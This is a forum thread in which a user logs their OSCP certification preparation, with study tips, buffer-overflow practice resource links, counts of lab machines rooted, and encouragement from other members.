OSCP - aka: Running head first into a brick wall - a journey

BuzzSawBuzzSaw Member Posts: 259 ■■■□□□□□□□
TLDR: I will post updates on my progress. Each update will include a section of "quicktips" to help other students. Also, I will include progress updates as well -- This is all so that I can help pass along information.


I will be starting my OSCP journey in mid October.

I am very excited as this has been a goal of mine for many years now. I have been following the offsec guys for a long time as I have used Kali quite a bit! I remember when Kali was sort of an obscure distro ....

To add to the pressure: I am also actively enrolled in the Cisco CyberOps course in cohort 4 ..... You know because I love running head first into a brick wall ...

I plan on posting my progress, resources, and frustration here. I know there are quite a few people that follow these threads to help them prepare. I did a CEH post as well, and I like that I can help people even if in a small way. - although I am enrolled in both the Cisco course and the OSCP, this thread will be focused on OSCP.

Some background:
I have quite a few years in "IT" (10+) in many areas. Currently I am the equivalent of a solutions architect. Security is not new to me, however it is not my primary job role. I really started cramming it in when I took my CEH last year, but I am a bit rusty ... Time to shake that rust off.

I am self taught in most everything I know as I did not go to school. I learn best by jumping in ... I don't scare away easily

Motivation:
This is mostly a personal goal as I don't have a strong desire to jump into a strict red team role right away. This to me is one of the crowning achievements in my certification path. Even though I am not going to immediately shift to pentesting, my current position will benefit greatly from the knowledge I'll gain which is why they are sponsoring me. Many of our customers rely on us for security recommendations

Personal Challenges:
Even though my employer is sponsoring me, this in no way makes the my day job any easier or time consuming. So I will be cramming this in along with my day job, with the Cisco Cyber course, family time (I have children). 2 up coming vacations, and just general life stuff. I am confident I can do it. And I want to do it to prove it to those on here that it can be done even with a busy schedule.

Stay tuned for updates. I plan on posting some "prep" material
«1

Comments

  • BuzzSawBuzzSaw Member Posts: 259 ■■■□□□□□□□
    My start date is 14 OCT! Stay Tuned
  • IntrusionNewbIntrusionNewb Registered Users Posts: 21 ■■□□□□□□□□
    Good luck. I'll be following.
  • BuzzSawBuzzSaw Member Posts: 259 ■■■□□□□□□□
    I got through all of the registration process yesterday.

    This weekend, I am spending some time doing some light reading, and follow up on a lot of the materials i used when going through my CEH prep.
  • BuzzSawBuzzSaw Member Posts: 259 ■■■□□□□□□□
    Pre-Start WEEK
    The clock is ticking until my start date. I have been using this time to do a few things:
    1. Continue working on my Cisco CCNA studies
    2. Brush up on notes and books used for the CEH
    3. Begin building my own system of building a "database" of resources for quick finding
    4. Talking to other students on the IRC #offsec channel
  • BuzzSawBuzzSaw Member Posts: 259 ■■■□□□□□□□
    WEEK 1

    I got my materials last week. I must say the materials are pretty good. The Videos are well done, and the PDF is easy to ready without a lot of needless words like many other books. The author does a good job at getting to the point of things

    My study was a bit slow this past week as I was doing some traveling which really cut into my productivity. I am still reading through the materials and watching the videos. I plan on getting through the rest of the materials and videos in the next couple days

    Quick tips:
    1. You really should know networking before you get going on this stuff. They do a good job at breaking the ice on other stuff, but if you don't know subnetting, how ports work, TCP, and IP, etc ... it's gonna be tough on you. I have a very firm grasps on these things, but I could see how someone could be overwhelmed just from the first chapter ...
    2. Make sure you are taking good notes. It just helps down the road.
    3. Some scans will take a long time! These are best executed while you are sleeping



    Material:
    I am about half way through the Material

    Lab:
    I have started to assemble a road map of the systems in the lab with some basic sweep, scans, and the like.

    Oh I also got a kick ass new laptop sticker! It added l33t hax0r skillz instantly
  • jamesleecolemanjamesleecoleman Member Posts: 1,899 ■■■■■□□□□□
    Could you show us the sticker? :)
    Booya!!
    WIP : | CISSP [2018] | CISA [2018] | CAPM [2018] | eCPPT [2018] | CRISC [2019] | TORFL (TRKI) B1 | Learning: | Russian | Farsi |
    *****You can fail a test a bunch of times but what matters is that if you fail to give up or not*****
  • BuzzSawBuzzSaw Member Posts: 259 ■■■□□□□□□□
    Week Two - Start of the week

    I got a lot of studying done last night. Being that I mostly was reading up until this point ... I was able to power through the exercises that I had to skip over due to my schedule last week. I learned quite a few new tips and tricks that I didn't know before, and that's always a good feeling. I'm caught up on reading, watching, and exercise reporting. Now, I am about to drive into Buffer Overflows -- which will be challenging I imagine as I have limited experience with these

    Quick Tips:
    - DO THE EXERCISES ... you will learn so much more - Even the ones that seem like they would be way to easy to be any sort of fun ...
    - Some Lab exercises will not be as black and white as they appear. I had to modify a few things to get a couple exercises to work.
    - From time to time Snapshot your Kali box. I've already had to revert it a couple times due to OpenVAS issues
    - Keep good notes. Alot of studying for me is done late at night. In the morning I review all the notes I took the night before, and it helps me not lose information to sleep deprivation
    - If you are using keepnote, or the something like that, just take a quick backup of those note files from time to time!

    Materials:
    Buffer overflows ... here I come

    Lab:
    I gave myself a strict(ish) rule that I wouldn't "attack" the labs until I got through my material. But I have already found 3 VM's that I could pop easily with exploits I've actually exploited before in other labs.

    Rooted: 0 (not yet started)
  • dr_fsmodr_fsmo Member Posts: 15 ■□□□□□□□□□
    I plan to start in November or December when work lets up a bit. I am trying to pre-study. How many days did you sign up for?
  • BuzzSawBuzzSaw Member Posts: 259 ■■■□□□□□□□
    dr_fsmo wrote: »
    I plan to start in November or December when work lets up a bit. I am trying to pre-study. How many days did you sign up for?

    I am enrolled for 60 days mostly because I'm not entirely new to the concepts in the course. That and, that about all I could get for training cost coverage - I'll pay out of pocket if I need additional time

    As for pre-study: It will sound corny, but check out Cybrary. Georgia W has a good pentesting course. Also, The Hacker Playbook 2. If you can watch that and practice some of those skills, then you will be off to a good start. Also, make sure you know networking pretty well. An in-depth primer (sort of an oxymoron) would be a good starter. Something that covers subnets, ports, OSI, three way handshake, etc - You don't need to be an CCIE here ... but a good understanding of basics will help
  • dr_fsmodr_fsmo Member Posts: 15 ■□□□□□□□□□
    Are you in any of the study groups on discord or slack? I have started Georgia's book and Cybary series as well.
  • jamesleecolemanjamesleecoleman Member Posts: 1,899 ■■■■■□□□□□
    Good luck on the buffer overflow stuff! I'm having the hardest time with that on the eCPPT stuff.
    Booya!!
    WIP : | CISSP [2018] | CISA [2018] | CAPM [2018] | eCPPT [2018] | CRISC [2019] | TORFL (TRKI) B1 | Learning: | Russian | Farsi |
    *****You can fail a test a bunch of times but what matters is that if you fail to give up or not*****
  • BuzzSawBuzzSaw Member Posts: 259 ■■■□□□□□□□
    dr_fsmo wrote: »
    Are you in any of the study groups on discord or slack? I have started Georgia's book and Cybary series as well.

    No I'm not. I wasn't aware that there were study groups. I think both of those require invite.
  • dr_fsmodr_fsmo Member Posts: 15 ■□□□□□□□□□
    There is a study group in slack and one in discord. I hope to obtain an invite with more time in the forums here.
  • BuzzSawBuzzSaw Member Posts: 259 ■■■□□□□□□□
    Quick Update:

    Working on BoF

    Buffer Overflows are (according to other Blogs) a big part of the lab, and ultimately the exam. It seems that passing the exam with a weak understanding of Overflows is possible, it's better to have a firm understanding.

    As such, I have built a Buffer Overflow lab to practice various things. Admittedly it took me a little longer that I would have liked to get it fully setup, but essentially you can setup the same lab with a Windows 7 machine (SP1 works best), Immunity Debugger, and a box such as Kali. -- I was working on this lab very late at night, and couldnt figure out why C++ redist wouldn't install only to find out I wasn't running SP1 (... dumb)

    If you are struggling with Buffer Overflows, you should check out the following https://github.com/justinsteven/dostackbufferoverflowgood
    Also a good blog entry from vortex: https://www.vortex.id.au/2017/05/pwkoscp-stack-buffer-overflow-practice/

    Quicktips:
    - Don't be scared of Buffer Overflows. It's execution is very tedious, but the understanding of what is happening can be understood pretty quickly
    - Realize that Buffer Overflows are actually a bit more common that you'd realize. If you can understand these, you will begin to understand a lot of the inner working for exploits.
    - Take time to read other materials on BoF.
    - Take time to build a lab

    Materials:
    I just wrapped up the Overflow sections and have put the material on hold until I have a better grasp as a whole. I am spending the next few days working on my own lab for Overflows.
  • BuzzSawBuzzSaw Member Posts: 259 ■■■□□□□□□□
  • BuzzSawBuzzSaw Member Posts: 259 ■■■□□□□□□□
    Week Three (sort ... Week two)
    REDACTED
    Root: None (haven't started)
  • BuzzSawBuzzSaw Member Posts: 259 ■■■□□□□□□□
  • CyberCop123CyberCop123 Member Posts: 338 ■■■■□□□□□□
    Good progress and good tips. I should probably do a bit more on gcc as I was getting really really frustrated that almost every exploit had huge errors when trying to compile.

    What machines did you get route on?

    Try out he minishare buffer overflow exploit. It's a really nice one and I found it satisfying to replicate on my own Windows XP lab machine.

    Im at the point now where I feel I've learned everything obvious from the text books. My issue is now execution. Realising what fits where.

    Im still mystified by SMB services and to some extent SNMP. I can enumerate them but not sure if I should be doing more with it.
    My Aims
    2017: OSCP -
    COMPLETED
    2018: CISSP -
    COMPLETED
    2019: GIAC GNFA - Advanced Network Forensics & Threat Hunting -
    COMPLETED
               GIAC GREM - Reverse Engineering of Malware -
    COMPLETED

    2021: CCSP
    2022: OSWE (hopefully)
  • BuzzSawBuzzSaw Member Posts: 259 ■■■□□□□□□□
  • BuzzSawBuzzSaw Member Posts: 259 ■■■□□□□□□□
  • BuzzSawBuzzSaw Member Posts: 259 ■■■□□□□□□□
    Update:

    Redacted

    rooted: 3
  • BuzzSawBuzzSaw Member Posts: 259 ■■■□□□□□□□
  • BuzzSawBuzzSaw Member Posts: 259 ■■■□□□□□□□
    UPDATE:

    Redacted

    ROOTED: 7
  • BuzzSawBuzzSaw Member Posts: 259 ■■■□□□□□□□
    URedacted

    Rooted: 7
  • BuzzSawBuzzSaw Member Posts: 259 ■■■□□□□□□□
    Redacted

    rooted: 8
  • BuzzSawBuzzSaw Member Posts: 259 ■■■□□□□□□□
    Redacted

    rooted: 9
  • jamesleecolemanjamesleecoleman Member Posts: 1,899 ■■■■■□□□□□
    This is kinda like watching a match or something. I'm really enjoying reading about your success!
    Booya!!
    WIP : | CISSP [2018] | CISA [2018] | CAPM [2018] | eCPPT [2018] | CRISC [2019] | TORFL (TRKI) B1 | Learning: | Russian | Farsi |
    *****You can fail a test a bunch of times but what matters is that if you fail to give up or not*****
  • BuzzSawBuzzSaw Member Posts: 259 ■■■□□□□□□□
    Redacted
    ROOTED: 11

    Redacted
  • LonerVampLonerVamp Member Posts: 518 ■■■■■■■■□□
    I find that hit order strange, but I can't say why, lol.

    Security Engineer/Analyst/Geek, Red & Blue Teams
    OSCP, GCFA, GWAPT, CISSP, OSWP, AWS SA-A, AWS Security, Sec+, Linux+, CCNA Cyber Ops, CCSK
    2021 goals: maybe AWAE or SLAE, bunch o' courses and red team labs?
  • BuzzSawBuzzSaw Member Posts: 259 ■■■□□□□□□□
    LonerVamp wrote: »
    I find that hit order strange, but I can't say why, lol.

    I didn't take them down in that order :)

    If you are in the labs, you'll see why I listed them that way.
Sign In or Register to comment.